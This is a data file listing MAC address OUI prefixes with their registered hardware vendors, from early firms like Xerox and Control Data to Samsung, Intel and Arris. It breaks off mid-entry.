Ubitrex +00400E Memotec +00C09E Cache Computers +00C093 Alta Research +00C034 Transaction Network +004034 Bustek +004097 Datex Division OF +00401E ICC +00407C Qume +004060 Comendec +004056 MCM Japan +004095 R.p.t. Intergroups Int'l +0040C3 Fischer AND Porter +0040F1 Chuo Electronics +004061 Datatech Enterprises +00408B Raylan +004020 CommScope +00406E Corollary +004016 ADC - Global Connectivity Solutions Division +004086 Michels & Kleberhoff Computer +0040DC Tritec Electronic Gmbh +004074 Cable AND Wireless +004084 Honeywell ACS +0040B8 Idea Associates +004058 Kronos +0040A8 IMF International +0080BB Hughes LAN Systems +00C0A0 Advance Micro Research +00C0D7 Taiwan Trading Center DBA +00C037 Dynatem +00C05F Fine-pal Company Limited +0040CE Net-source +004080 Athenix +0040BB Goldstar Cable +0040B1 Codonics +00402E Precision Software +00C0CE CEI Systems & Engineering PTE +00409B HAL Computer Systems +004073 Bass Associates +10005A IBM +004005 ANI Communications +004099 Newgen Systems +0040E1 Marner International +0080DD GMX/gimix +0080B7 Stellar Computer +008002 Satelcom (uk) +00805C Agilis +008070 Computadoras Micron +00808F C. Itoh Electronics +000091 Anritsu +000094 Asante Technologies +000090 Microcom +000047 Nicolet Instruments +0000FB Rechner ZUR Kommunikation +0000A3 Network Application Technology +00008F Raytheon +00007E Clustrix +00000A Omron Tateisi Electronics +000063 Barco Control Rooms Gmbh +00004E Ampex +0000C2 Information Presentation TECH. +000034 Network Resources +000049 Apricot Computers +0000E2 Acer Technologies +0000D4 Pure Data +0000E1 Grid Systems +000044 Castelle +000027 Japan Radio Company +004049 Roche Diagnostics International +004029 Compex +008038 Data Research & Applications +008090 Microtek International +0080C3 Bicc Information Systems & SVC +00805A Tulip Computers Internat'l B.V +0080F0 Panasonic Communications +008043 Networld +0080B0 Advanced Information +008066 Arcom Control Systems +004051 Gracilis +004064 KLA Instruments +004028 Netcomm Limited +004013 NTT Data COMM. Systems +0040A0 Goldstar +0040B2 Systemforschung +004071 ATM Computer Gmbh +0080BF Takaoka Electric MFG. +0080F6 Synergy Microsystems +000058 Racore Computer Products +000050 Radisys +008082 PEP Modular Computers Gmbh +008096 Human Designed Systems +0080D5 Cadre Technologies +00803E Synernetics +00809A Novus Networks +0080B3 Aval Data +0080A3 Lantronix +00803C TVS Electronics +008061 Litton Systems +0080AD Cnet Technology +008081 Kendall Square Research +008019 Dayna Communications +00808B Dacoll Limited +008097 Centralp Automatismes +0080FC Avatar +008076 Mcnc +008080 Datamedia +0000E6 Aptor Produits DE Comm Indust +000084 Supernet +0000FF Camtec Electronics +00007B Research Machines +000056 DR. B. Struck +0000BB Tri-data +080025 Control Data +080020 Oracle +027001 Racal-datacom +080006 Siemens AG +08007E Amalgamated Wireless(aus) +080075 Dansk Data Electronik +080073 Tecmar +080069 Silicon Graphics +080061 Jarogate +08005D Gould +08004E 3com Europe +08004A Banyan Systems +08004C Hydra Computer Systems +080043 Pixel Computer +08003A Orcatech +080035 Microfive +080036 Intergraph +08002D Lan-tec +000025 Ramtek +00003A Chyron +000077 Interphase +000096 Marconi Electronics +000076 Abekas Video System +0000EA Upnod AB +000074 Ricoh Company +00006A Computer Consoles +0000C4 Waters DIV. OF Millipore +000006 Xerox +0001C8 Thomas Conrad +00DD0E Ungermann-bass +08008D Xyvision +080059 A/S Mycron +021C7C Perq Systems +100000 Private +080004 Cromemco Incorporated +00DD07 Ungermann-bass +00003E Simpact +04E0C4 Triumph-adler AG +040AE0 Xmit AG Computer Networks +080016 Barrister Info SYS +080012 Bell Atlantic Integrated SYST. +0001C8 Conrad +0000F9 Quotron Systems +0000BF Symmetric Computer Systems +000085 Canon +000028 Prodigy Systems +000012 Information Technology Limited +080085 Elxsi +00005B Eltec Elektronik AG +000054 Schneider Electric +0000A9 Network Systems +000059 Hellige Gmbh +000099 MTX +0000E9 Isicad +08003F Fred Koschara Enterprises +080002 Bridge Communications +08008B Pyramid Technology +000002 Xerox +84F6FA Miovision Technologies Incorporated +CC3B3E Lester Electrical +C05627 Belkin International +4065A3 Sagemcom Broadband SAS +00789E Sagemcom Broadband SAS +44E9DD Sagemcom Broadband SAS +B888E3 Compal Information (kunshan) +002622 Compal Information (kunshan) +001EEC Compal Information (kunshan) +DC0EA1 Compal Information (kunshan) +FC4596 Compal Information (kunshan) +208984 Compal Information (kunshan) +247C4C Herman Miller +180373 Dell +F8B156 Dell +1C4024 Dell +F8BC12 Dell +001B5B 2Wire +002456 2Wire +002351 2Wire +00253C 2Wire +0022A4 2Wire +C0830A 2Wire +D0431E Dell +246E96 Dell +204747 Dell +4C7625 Dell +B8AC6F Dell +001EC9 Dell +E09861 Motorola Mobility, a Lenovo Company +F4F1E1 Motorola Mobility, a Lenovo Company +60BEB5 Motorola Mobility, a Lenovo Company +7845C4 Dell +B4E1C4 Microsoft Mobile Oy +D86C02 Huaqin Telecom Technology +0019D2 Intel Corporate +7C5CF8 Intel Corporate +001E67 Intel Corporate +001F3C Intel Corporate +0022FA Intel Corporate +001517 Intel Corporate +00166F Intel Corporate +A44E31 Intel Corporate +6C8814 Intel Corporate +F81654 Intel Corporate +3413E8 Intel Corporate +34E6AD Intel Corporate +FCF8AE Intel Corporate +648099 Intel Corporate +002314 Intel Corporate +4025C2 Intel Corporate +8CA982 Intel Corporate +D07E35 Intel Corporate +685D43 Intel Corporate +90E2BA Intel Corporate +0026C7 Intel Corporate +8086F2 Intel Corporate +78FF57 Intel Corporate +20934D Fujian Star-net Communication +00AA00 Intel +6CF37F Aruba Networks +605BB4 AzureWave Technology +9C0E4A Shenzhen Vastking Electronic +ACE5F0 Doppler Labs +00F28B Cisco Systems +5414FD Orbbec 3D Technology International +1C4BD6 AzureWave Technology +94DBC9 AzureWave Technology +40E230 AzureWave Technology +00006E Artisoft +A0F459 Fn-link Technology Limited +0C6AE6 Stanley Security Solutions +E874E6 ADB Broadband Italia +00247B Actiontec Electronics +689C5E AcSiP Technology +0012CF Accton Technology +0030D3 Agilent Technologies +38229D ADB Broadband Italia +002233 ADB Broadband Italia +D4D184 ADB Broadband Italia +34C3D2 Fn-link Technology Limited +38E3C5 Taicang T&W Electronics +D0E44A Murata Manufacturing +9433DD Taco +948815 Infinique Worldwide +3010B3 Liteon Technology +001802 Alpha Networks +ECCD6D Allied Telesis +00225F Liteon Technology +983B16 Ampak Technology +402BA1 Sony Mobile Communications AB +0025E7 Sony Mobile Communications AB +D05162 Sony Mobile Communications AB +94CE2C Sony Mobile Communications AB +001A80 Sony +0024BE Sony +001620 Sony Mobile Communications AB +0012EE Sony Mobile Communications AB +20689D Liteon Technology +446D57 Liteon Technology +44EE02 MTI +0026B6 Askey Computer +B4EEB4 Askey Computer +FCB4E6 Askey Computer +F05C19 Aruba Networks +70AAB2 BlackBerry RTS +0026FF BlackBerry RTS +406F2A BlackBerry RTS +002557 BlackBerry RTS +0024FE AVM GmbH +745AAA Huawei Technologies +7C1CF1 Huawei Technologies +00264D Arcadyan Technology +74A528 Huawei Technologies +30A220 ARG Telecom +783E53 BSkyB +4CF2BF Cambridge Industries(Group) +70D931 Cambridge Industries(Group) +00E063 Cabletron Systems +E01D3B Cambridge Industries(Group) +D476EA zte +0040FB Cascade Communications +F05A09 Samsung Electronics +503275 Samsung Electronics +28CC01 Samsung Electronics +B46293 Samsung Electronics +04FE31 Samsung Electronics +845181 Samsung Electronics +D831CF Samsung Electronics +F8D0BD Samsung Electronics +FCC734 Samsung Electronics +E4B021 Samsung Electronics +B0EC71 Samsung Electronics +3CBBFD Samsung Electronics +2CAE2B Samsung Electronics +C488E5 Samsung Electronics +7C9122 Samsung Electronics +E8B4C8 Samsung Electronics +18895B Samsung Electronics +E0DB10 Samsung Electronics +E09971 Samsung Electronics +6077E2 Samsung Electronics +680571 Samsung Electronics +6C2F2C Samsung Electronics +000136 CyberTAN Technology +F88E85 Comtrend +300D43 Microsoft Mobile Oy +6C2779 Microsoft Mobile Oy +607EDD Microsoft Mobile Oy +F88096 Elsys Equipamentos Eletrnicos Ltda +E0B9E5 Technicolor +0CBF15 Genetec +000B5D Fujitsu Limited +F4CAE5 Freebox SAS +002100 Gemtek Technology +002147 Nintendo +0022AA Nintendo +0022D7 Nintendo +002331 Nintendo +00241E Nintendo +78A2A0 Nintendo +001B7A Nintendo +40F407 Nintendo +B8AE6E Nintendo +60A8FE Nokia +546751 Compal Broadband Networks +84BA3B Canon +0018C5 Nokia Danmark A/S +80501B Nokia +347E39 Nokia Danmark A/S +A87E33 Nokia Danmark A/S +00247D Nokia Danmark A/S +001BAF Nokia Danmark A/S +001C35 Nokia Danmark A/S +001CD4 Nokia Danmark A/S +001979 Nokia Danmark A/S +9C1874 Nokia Danmark A/S +0021FC Nokia Danmark A/S +001F5D Nokia Danmark A/S +0025CF Nokia Danmark A/S +0025D0 Nokia Danmark A/S +001FDE Nokia Danmark A/S +907282 Sagemcom Broadband SAS +006CFD Sichuan Changhong Electric +1C234F Edmi Europe +A444D1 Wingtech Group (HongKongLimited +1C9E46 Apple +005058 Sangoma Technologies +3482DE Kiio +0008F6 Sumitomo Electric Industries +00005F Sumitomo Electric Industries +A0C589 Intel Corporate +74BFB7 Nusoft +50DA00 Hangzhou H3C Technologies, Limited +9C2A83 Samsung Electronics +E45D75 Samsung Electronics +3CBEE1 Nikon +047E4A moobox +E0C767 Apple +2C09CB Cobs AB +60ACC8 KunTeng +0404EA Valens Semiconductor +800DD7 Latticework +402E28 MiXTelematics +18C501 Shenzhen Gongjin Electronics +546D52 Topview Optronics +CCB3AB shenzhen Biocare Bio-Medical Equipment +E4B318 Intel Corporate +00C88B Cisco Systems +A85EE4 12Sided Technology +000CC1 Eaton +0090F9 Imagine Communications +04C103 Clover Network +1C553A QianGua +E4A7A0 Intel Corporate +E4FAED Samsung Electronics +789682 zte +F02745 F-Secure +54D0B4 Xiamen Four-Faith Communication Technology +D017C2 Asustek Computer +001625 Impinj +60EE5C Shenzhen Fast Technologies +58D67A TCPlink +00A0DE Yamaha +081F71 TP-Link Technologies +2C2D48 bct electronic GesmbH +E4A471 Intel Corporate +00A0F4 GE +00CAE5 Cisco Systems +4883C7 Sagemcom Broadband SAS +7050AF BSkyB +F4EF9E Sgsg Science & Technology +DC9C9F Shenzhen Youhua Technology +0CBF3F Shenzhen Lencotion Technology +84FEDC Borqs Beijing +D8D723 IDS +703A0E Aruba Networks +7054D2 Pegatron +7C0507 Pegatron +C07CD1 Pegatron +94DBDA Huawei Technologies +384C4F Huawei Technologies +E4A8B6 Huawei Technologies +244C07 Huawei Technologies +E840F2 Pegatron +F0D1B8 Ledvance +60B387 Synergics Technologies GmbH +7085C2 ASRock Incorporation +C825E1 Lemobile Information Technology (Beijing) +0022B1 Elbit Systems +00065F ECI Telecom +001F45 Enterasys +0090FA Emulex +50C971 GN Netcom A/S +001D82 GN Netcom A/S +001317 GN Netcom A/S +749781 zte +B4B15A Siemens AG Energy Management Division +A8D828 Ascensia Diabetes Care +FCBC9C Vimar Spa +149ECF Dell +AC620D Jabil Circuit(Wuxi) +008CFA Inventec +0008B9 Kaonmedia +C83F26 Microsoft +00E0E6 Incaa Computers +5C5EAB Juniper Networks +7819F7 Juniper Networks +2C2172 Juniper Networks +88E0F3 Juniper Networks +4C9614 Juniper Networks +3C8AB0 Juniper Networks +B0C69A Juniper Networks +009069 Juniper Networks +204E71 Juniper Networks +F4B52F Juniper Networks +88A25E Juniper Networks +001BC0 Juniper Networks +F49EEF Taicang T&W Electronics +F4911E Zhuhai Ewpe Information Technology +94FE22 Huawei Technologies +F823B2 Huawei Technologies +DCD916 Huawei Technologies +002552 VXi +006CBC Cisco Systems +DC3752 GE +B4D5BD Intel Corporate +7CB0C2 Intel Corporate +98AA3C Will i-tech +449F7F DataCore Software +0011FC Harting Electronics Gmbh +5CDD70 Hangzhou H3C Technologies, Limited +24BF74 Private +B8E779 9Solutions Oy +240A11 TCT mobile +C84544 Asia Pacific CIS (Wuxi) +E8A7F2 sTraffic +D8209F Cubro Acronet GesmbH +A860B6 Apple +24F094 Apple +90B0ED Apple +C4B301 Apple +E05F45 Apple +483B38 Apple +E47B3F Beijing-cloud Technology +A0415E Opsens Solution +1C6E76 Quarion Technology +000AAB Toyota Technical Development +44D1FA Shenzhen Yunlink Technology +08C021 Huawei Technologies +48435A Huawei Technologies +9CE374 Huawei Technologies +6C0EE6 Chengdu Xiyida Electronic Technology +78FFCA Tecno Mobile Limited +F03EBF Gogoro Taiwan Limited +50AB3E Qibixx AG +A8BB50 WiZ IoT Company Limited +005F86 Cisco Systems +E46251 HAO Cheng Group Limited +8850DD Infiniband Trade Association +DC7834 Logicom SA +54F201 Samsung Electronics +A06090 Samsung Electronics +3876CA Shenzhen Smart Intelligent TechnologyLtd +D0577B Intel Corporate +B824F0 Soyo Technology Development +B456B9 Teraspek Technologies +68B35E Shenzhen Neostra TechnologyLtd +24E271 Qingdao Hisense Communications +BC6010 Qingdao Hisense Communications +AC3743 HTC +603197 ZyXEL Communications +0019CB ZyXEL Communications +FCF528 ZyXEL Communications +588BF3 ZyXEL Communications +D8B02E Guangzhou Zonerich Business Machine +849D64 SMC +A020A6 Espressif +88F7C7 Technicolor CH USA +08952A Technicolor CH USA +C4BB4C Zebra Information Tech +8C04FF Technicolor CH USA +001972 Plexus (Xiamen) +6488FF Sichuan Changhong Electric +005979 Networked Energy Services +000997 Nortel Networks +000E62 Nortel Networks +000EC0 Nortel Networks +000FCD Nortel Networks +0004DC Nortel Networks +02E6D3 Nixdorf Computer +0016B9 ProCurve Networking by HP +0024A8 ProCurve Networking by HP +CC3ADF Private +141F78 Samsung Electronics +006F64 Samsung Electronics +DC6672 Samsung Electronics +0025C3 21168 +001365 Nortel Networks +001ECA Nortel Networks +001D42 Nortel Networks +001CEB Nortel Networks +002363 Zhuhai Raysharp Technology +D03742 Yulong Computer Telecommunication Scientific (Shenzhen) +001CFD Universal Electronics +080051 ExperData +0080C7 Xircom +049FCA Huawei Technologies +C81FBE Huawei Technologies +203DB2 Huawei Technologies +48D539 Huawei Technologies +10E68F Kwangsung Electronics Korea +1899F5 Sichuan Changhong Electric +E41D2D Mellanox Technologies +B80018 Htel +0081C4 Cisco Systems +E8FD90 Turbostor +0017EA Texas Instruments +0017E3 Texas Instruments +001834 Texas Instruments +00182F Texas Instruments +78DEE4 Texas Instruments +B8FFFE Texas Instruments +E0D7BA Texas Instruments +405FC2 Texas Instruments +8030DC Texas Instruments +CC78AB Texas Instruments +A4D578 Texas Instruments +544A16 Texas Instruments +D8DDFD Texas Instruments +20CD39 Texas Instruments +987BF3 Texas Instruments +247189 Texas Instruments +EC1127 Texas Instruments +F0C77F Texas Instruments +F45EAB Texas Instruments +001783 Texas Instruments +A81B6A Texas Instruments +9884E3 Texas Instruments +38D269 Texas Instruments +C8FD19 Texas Instruments +508CB1 Texas Instruments +04BBF9 Pavilion Data Systems +B0F893 Shanghai Mxchip Information Technology +00C017 NetScout Systems +D49B5C Chongqing Miedu Technology +C0D391 Ieee Registration Authority +C411E0 Bull Group +90842B Lego System A/S +84C7EA Sony Mobile Communications AB +8C6102 Beijing Baofengmojing Technologies +FC9114 Technicolor CH USA +1C25E1 China Mobile IOT Company Limited +C0F636 Hangzhou Kuaiyue Technologies +F0038C AzureWave Technology +B45D50 Aruba Networks +001E7D Samsung Electronics +3C6200 Samsung Electronics +0024E9 Samsung Electronics +002399 Samsung Electronics +E4E0C5 Samsung Electronics +E8039A Samsung Electronics +C4731E Samsung Electronics +78D6F0 Samsung Electro Mechanics +B407F9 Samsung Electro Mechanics +40B89A Hon Hai Precision Ind. +A8A795 Hon Hai Precision Ind. +8096CA Hon Hai Precision Ind. +9CD21E Hon Hai Precision Ind. +D87988 Hon Hai Precision Ind. +00242B Hon Hai Precision Ind. +00242C Hon Hai Precision Ind. +945330 Hon Hai Precision Ind. +EC0EC4 Hon Hai Precision Ind. +7429AF Hon Hai Precision Ind. +346895 Hon Hai Precision Ind. +A86BAD Hon Hai Precision Ind. +D80F99 Hon Hai Precision Ind. +78DD08 Hon Hai Precision Ind. +00197E Hon Hai Precision Ind. +A0AB1B D-Link International +5C4979 AVM Audiovisuelles Marketing und Computersysteme GmbH +086A0A Askey Computer +101250 Integrated Device Technology (Malaysia) Sdn. Bhd. +8C7712 Samsung Electronics +2013E0 Samsung Electronics +0007AB Samsung Electronics +0021D2 Samsung Electronics +BC4760 Samsung Electronics +D0176A Samsung Electronics +F0D9B2 EXO +2CBABA Samsung Electronics +24920E Samsung Electronics +40D3AE Samsung Electronics +802AA8 Ubiquiti Networks +00156D Ubiquiti Networks +787D48 Itel Mobile Limited +D46E0E TP-Link Technologies +049790 Lartech telecom +8CEA1B Edgecore Networks +001650 Kratos EPD +583112 Drust +58696C Ruijie Networks +A0B8F8 Amgen U.S.A. +14A51A Huawei Technologies +C816A5 Masimo +9002A9 Zhejiang Dahua Technology +ACD657 Shaanxi GuoLian Digital TV Technology +244E7B Ieee Registration Authority +E80945 Integrated Device Technology (Malaysia) Sdn. Bhd. +98FD74 Act.co.ltd +60C798 Verifone +A46011 Verifone +2C2131 Juniper Networks +0CC47A Super Micro Computer +60427F Shenzhen Chuangwei-rgb Electronics +F8461C Sony Interactive Entertainment +500B91 Ieee Registration Authority +40B93C Hewlett Packard Enterprise +4C7487 Leader Phone Communication Technology +F48C50 Intel Corporate +E8E875 iS5 Communications +000422 Studio Technologies +ACC662 MitraStar Technology +B8ECA3 ZyXEL Communications +F01DBC Microsoft +404D7F Apple +7C04D0 Apple +BC9FEF Apple +8866A5 Apple +ACDCE5 Procter & Gamble Company +784F43 Apple +98D293 Google +5CCCA0 Gridwiz +104FA8 Sony +6C25B9 BBK Educational Electronics +486B2C BBK Educational Electronics +00001F Telco Systems +BC307E Wistron Neweb +00C0AB Telco Systems +0010CA Telco Systems +0C2576 Longcheer Telecommunication Limited +0007A6 Leviton Manufacturing +208756 Siemens AG +B08900 Huawei Technologies +A03E6B Ieee Registration Authority +DC4427 Ieee Registration Authority +0055DA Ieee Registration Authority +90C682 Ieee Registration Authority +986D35 Ieee Registration Authority +E0B6F5 Ieee Registration Authority +C47C8D Ieee Registration Authority +001BC5 Ieee Registration Authority +640DCE Shenzhen Mercury Communication Technologies +100723 Ieee Registration Authority +6063F9 Ciholas +F0421C Intel Corporate +C0E42D TP-Link Technologies +18D6C7 TP-Link Technologies +B8BB23 Guangdong Nufront CSC +EC26FB Tecc +0090CC Planex Communications +E09DB8 Planex Communications +903AE6 Parrot SA +00E00F Shanghai Baud Data Communication +3C404F Guangdong Pisen Electronics +F0ACD7 Ieee Registration Authority +00233E Alcatel-Lucent IPD +6CBEE9 Alcatel-Lucent IPD +0080F7 Zenith Electronics +00C095 Znyx Networks +60EB69 Quanta Computer +C80AA9 Quanta Computer +00238B Quanta Computer +0007BA UTStarcom +4439C4 Universal Global Scientific Industrial +70F395 Universal Global Scientific Industrial +001E37 Universal Global Scientific Industrial +002713 Universal Global Scientific Industrial +002186 Universal Global Scientific Industrial +8CFDF0 Qualcomm +000031 Qpsx Communications +000E7B Toshiba +B86B23 Toshiba +000C29 VMware +005056 VMware +001C4D Aplix IP Holdings +D0052A Arcadyan +F485C6 FDT Technologies +BC60A7 Sony Interactive Entertainment +08D833 Shenzhen RF Technology +94D469 Cisco Systems +385610 Candy House +20F543 Hui Zhou Gaoshengda Technology +685388 P&S Technology +54A619 Alcatel-Lucent Shanghai Bell +1880F5 Alcatel-Lucent Shanghai Bell +24DBED Samsung Electronics +AC3613 Samsung Electronics +1449E0 Samsung Electro-mechanics(thailand) +C0BDD1 Samsung Electro-mechanics(thailand) +E8508B Samsung Electro-mechanics(thailand) +F025B7 Samsung Electro-mechanics(thailand) +C8BA94 Samsung Electro-mechanics(thailand) +EC1F72 Samsung Electro-mechanics(thailand) +9852B1 Samsung Electronics +1489FD Samsung Electronics +CCFE3C Samsung Electronics +789ED0 Samsung Electronics +E440E2 Samsung Electronics +1CAF05 Samsung Electronics +E492FB Samsung Electronics +247F20 Sagemcom Broadband SAS +0073E0 Samsung Electronics +BC4486 Samsung Electronics +380B40 Samsung Electronics +8C0D76 Huawei Technologies +005A13 Huawei Technologies +002490 Samsung Electronics +0023D7 Samsung Electronics +FCA13E Samsung Electronics +A00798 Samsung Electronics +945103 Samsung Electronics +C819F7 Samsung Electronics +2C4401 Samsung Electronics +84E0F4 Ieee Registration Authority +08C6B3 Qtech +64DAA0 Robert Bosch Smart Home GmbH +14B837 Shenzhen Youhua Technology +8056F2 Hon Hai Precision Ind. +70188B Hon Hai Precision Ind. +3C77E6 Hon Hai Precision Ind. +0C84DC Hon Hai Precision Ind. +844BF5 Hon Hai Precision Ind. +E006E6 Hon Hai Precision Ind. +60F494 Hon Hai Precision Ind. +A41731 Hon Hai Precision Ind. +C0143D Hon Hai Precision Ind. +642737 Hon Hai Precision Ind. +60D819 Hon Hai Precision Ind. +6474F6 Shooter Detection Systems +604BAA Private +CC7314 Hong Kong Wheatek Technology Limited +C0CB38 Hon Hai Precision Ind. +98E7F4 Hewlett Packard +D42C44 Cisco Systems +D842E2 Canary Connect +500959 Technicolor CH USA +143365 TEM Mobile Limited +C0F945 Toshiba Toko Meter Systems +ACAB2E Beijing LasNubes Technology +10E878 Nokia +48F7F1 Nokia +4CC94F Nokia +1CEA1B Nokia +B4F81E Kinova +28CA09 ThyssenKrupp Elevators (Shanghai) +E0B94D Shenzhen Bilian Electronicltd +D8380D Shenzhen Ip-com Network +A4C64F Huawei Technologies +C83DD4 CyberTAN Technology +487B6B Huawei Technologies +9C62AB Sumavision Technologies +487A55 ALE International +000435 InfiNet +BC39D9 Z-tec +88E87F Apple +B853AC Apple +B04BBF PT HAN Sung Electoronics Indonesia +0060D6 NovAtel +2C3361 Apple +78B84B Sichuan Tianyi Comheart Telecomco. +40F420 Sichuan Tianyi Comheart Telecomco. +9C6121 Sichuan Tianyi Comheart Telecomco. +8C8ABB Beijing Orient View Technology +88366C EFM Networks +F074E4 Thundercomm Technology +A0722C Humax +FCECDA Ubiquiti Networks +E07C13 zte +58E16C Ying Hua Information Technology (Shanghai)Co. +24C1BD Crrc Dalian R&D +A81E84 Quanta Computer +C82158 Intel Corporate +2420C7 Sagemcom Broadband SAS +703D15 Hangzhou H3C Technologies, Limited +4018B1 Aerohive Networks +001977 Aerohive Networks +C8665D Aerohive Networks +4865EE Ieee Registration Authority +3CEF8C Zhejiang Dahua Technology +A0CC2B Murata Manufacturing +00234A Private +88C626 Logitech +28E31F Xiaomi Communications +0C1DAF Xiaomi Communications +14F65A Xiaomi Communications +742344 Xiaomi Communications +F0B429 Xiaomi Communications +94E979 Liteon Technology +AC1F6B Super Micro Computer +80D4A5 Huawei Technologies +38BC01 Huawei Technologies +04B0E7 Huawei Technologies +446A2E Huawei Technologies +0026AB Seiko Epson +64EB8C Seiko Epson +A06FAA LG Innotek +0015FC Littelfuse Startco +504B5B Controltronic Gmbh +A0E0AF Cisco Systems +603E7B Gafachi +98F199 NEC Platforms +78FC14 Family Zone Cyber Safety +1062EB D-Link International +E0A700 Verkada +901711 Hagenuk Marinekommunikation GmbH +D825B0 Rockeetech Systems +74614B Chongqing Huijiatong Information Technology +C0D9F7 ShanDong Domor Intelligent S&T +94FB29 Zebra Technologies +64DBA0 Select Comfort +5800E3 Liteon Technology +64777D Hitron Technologies. +0495E6 Tenda Technology,Ltd.Dongguan branch +0016D3 Wistron +001F16 Wistron +4C4E03 TCT mobile +50E666 Shenzhen Techtion Electronics +6831FE Teladin +EC43F6 ZyXEL Communications +D4B169 Le Shi Zhi Xin Electronic Technology (Tianjin) Limited +0C3CCD Universal Global Scientific Industrial +B04089 Senient Systems +002445 Adtran +689FF0 zte +7CC6C4 Kolff Computer Supplies +14B7F8 Technicolor CH USA +F06E32 Microtel Innovation S.r.l. +00E022 Analog Devices +7C67A2 Intel Corporate +000302 Charles Industries +0896AD Cisco Systems +8CF5A3 Samsung Electro-mechanics(thailand) +B8EAAA ICG Networks +B8F883 TP-Link Technologies +DCFE18 TP-Link Technologies +AC60B6 Ericsson AB +3C197D Ericsson AB +74C99A Ericsson AB +000F4F PCS Systemtechnik GmbH +7C5A1C Sophos +00E400 Sichuan Changhong Electric +00117E Midmark +105AF7 ADB Italia +703ACB Google +D481D7 Dell +2C55D3 Huawei Technologies +F44C7F Huawei Technologies +143004 Huawei Technologies +7C4685 Motorola (Wuhan) Mobility Technologies Communication +E05163 Arcadyan +00A06F Color Sentinel Systems +0C5F35 Niagara Video +B85001 Extreme Networks +000496 Extreme Networks +7C3866 Texas Instruments +50F14A Texas Instruments +9C1D58 Texas Instruments +500FF5 Tenda Technology,Ltd.Dongguan branch +1C1EE3 Hui Zhou Gaoshengda Technology +F0272D Amazon Technologies +74C246 Amazon Technologies +F4C4D6 Shenzhen Xinfa Electronic +08B258 Juniper Networks +C03D46 Shanghai Sango Network Technology +E89FEC Chengdu KT Electronic Hi-tech +BCA042 Shanghai Flyco Electrical Appliance +D47DFC Tecno Mobile Limited +443708 MRV Comunications +14568E Samsung Electronics +6837E9 Amazon Technologies +8058F8 Motorola Mobility, a Lenovo Company +F0D7AA Motorola Mobility, a Lenovo Company +28FF3E zte +886B6E Apple +4C74BF Apple +70F087 Apple +285767 Echostar Technologies +0024AF Echostar Technologies +04C9D9 Echostar Technologies +D0498B Zoom Server +C49DED Microsoft +98A40E Snap +2C5A0F Cisco Systems +AC7409 Hangzhou H3C Technologies, Limited +E037BF Wistron Neweb +4C8120 Taicang T&W Electronics +E8E732 Alcatel-Lucent Enterprise +00118B Alcatel-Lucent Enterprise +00E0B1 Alcatel-Lucent Enterprise +6854ED Alcatel-Lucent +B42A0E Technicolor CH USA +E8DE8E Integrated Device Technology (Malaysia) Sdn. Bhd. +40C8CB AM Telecom +14A0F8 Huawei Technologies +28B448 Huawei Technologies +E442A6 Intel Corporate +6045CB Asustek Computer +84AFEC Buffalo.inc +AC202E Hitron Technologies. +48A74E zte +3C5282 Hewlett Packard +B0AA36 Guangdong Oppo Mobile Telecommunications +2C5BB8 Guangdong Oppo Mobile Telecommunications +1C48CE Guangdong Oppo Mobile Telecommunications +004066 Apresia Systems +9CAC6D Universal Electronics +B03D96 Vision Valley FZ +B02628 Broadcom Limited +E81363 Comstock RD +44AA50 Juniper Networks +0080E7 Leonardo Tactical Systems. +688DB6 Aetek +481063 NTT Innovation Institute +24F5AA Samsung Electronics +F877B8 Samsung Electronics +682737 Samsung Electronics +5056BF Samsung Electronics +D428D5 TCT mobile +405CFD Dell +00D037 Arris Group +001DD6 Arris Group +306023 Arris Group +ACB313 Arris Group +14ABF0 Arris Group +0CF893 Arris Group +8461A0 Arris Group +E83381 Arris Group +44E137 Arris Group +FC6FB7 Arris Group +A0C562 Arris Group +A055DE Arris Group +54E2E0 Arris Group +28C87A Arris Group +0026D9 Arris Group +C8AA21 Arris Group +2C9E5F Arris Group +002495 Arris Group +002642 Arris Group +A4ED4E Arris Group +0024A1 Arris Group +002375 Arris Group +0015CE Arris Group +001311 Arris Group +0015A2 Arris Group +001596 Arris Group +0000CA Arris Group +601971 Arris Group +001DD1 Arris Group +001626 Arris Group +00111A Arris Group +00152F Arris Group +000B06 Arris Group +000F9F Arris Group +0011AE Arris Group +002040 Arris Group +1C1B68 Arris Group +10868C Arris Group +1005B1 Arris Group +7C2634 Arris Group +001E5A Arris Group +001DBE Arris Group +001371 Arris Group +00149A Arris Group +001A1B Arris Group +0018A4 Arris Group +001ADB Arris Group +001F7E Arris Group +001C11 Arris Group +001CC1 Arris Group +001D6B Arris Group +400D10 Arris Group +341FE4 Arris Group +A0094C CenturyLink +00A38E Cisco Systems +DCC8F5 Shanghai UMEinfo +64DFE9 Ateme +9097F3 Samsung Electronics +58C5CB Samsung Electronics +ACAFB9 Samsung Electronics +308976 Dalian Lamba Technology +447BBB Shenzhen Youhua Technology +A4F4C2 Vnpt Technology +C0A5DD Shenzhen Mercury Communication Technologies +1835D1 Arris Group +4C38D8 Arris Group +DCBE7A Zhejiang Nurotron Biotechnology +206BE7 TP-Link Technologies +4857DD Facebook +681DEF Shenzhen CYX Technology +AC203E Wuhan Tianyu Information Industry +30074D Samsung Electro-mechanics(thailand) +00A3D1 Cisco Systems +801DAA Avaya +001B4F Avaya +7052C5 Avaya +848371 Avaya +24D921 Avaya +A051C6 Avaya +90EC50 C.o.b.o. SPA +90FB5B Avaya +B4475E Avaya +D4EA0E Avaya +A009ED Avaya +3C0CDB Unionman Technology +C81FEA Avaya +F01B6C vivo Mobile Communication +DC1AC5 vivo Mobile Communication +205D47 vivo Mobile Communication +9CFBD5 vivo Mobile Communication +10F681 vivo Mobile Communication +886AE3 Alpha Networks +9061AE Intel Corporate +A4F3E7 Integrated Device Technology (Malaysia) Sdn. Bhd. +A0239F Cisco Systems +D8DF7A Quest Software +30B62D Mojo Networks +001B17 Palo Alto Networks +9828A6 Compal Information (kunshan) +B0EABC Askey Computer +94C691 EliteGroup Computer Systems +9C6F52 zte +A09D86 Alcatel-Lucent Shanghai Bell +E0CBBC Cisco Meraki +00D01F Senetas +A40450 nFore Technology +4CB008 Shenzhen Gwelltimes Technology +2CE6CC Ruckus Wireless +8C0C90 Ruckus Wireless +842096 Shenzhen Rf-link Technology +589396 Ruckus Wireless +74911A Ruckus Wireless +00227F Ruckus Wireless +002482 Ruckus Wireless +58B633 Ruckus Wireless +D4684D Ruckus Wireless +F03E90 Ruckus Wireless +EC8CA2 Ruckus Wireless +3087D9 Ruckus Wireless +24792A Ruckus Wireless +30F77F S Mobile Devices Limited +5C5181 Samsung Electronics +389AF6 Samsung Electronics +E0AA96 Samsung Electronics +507705 Samsung Electronics +38E595 Shenzhen Gongjin Electronics +C4CB6B Airista Flow +B05508 Huawei Technologies +008BFC mixi +2C4053 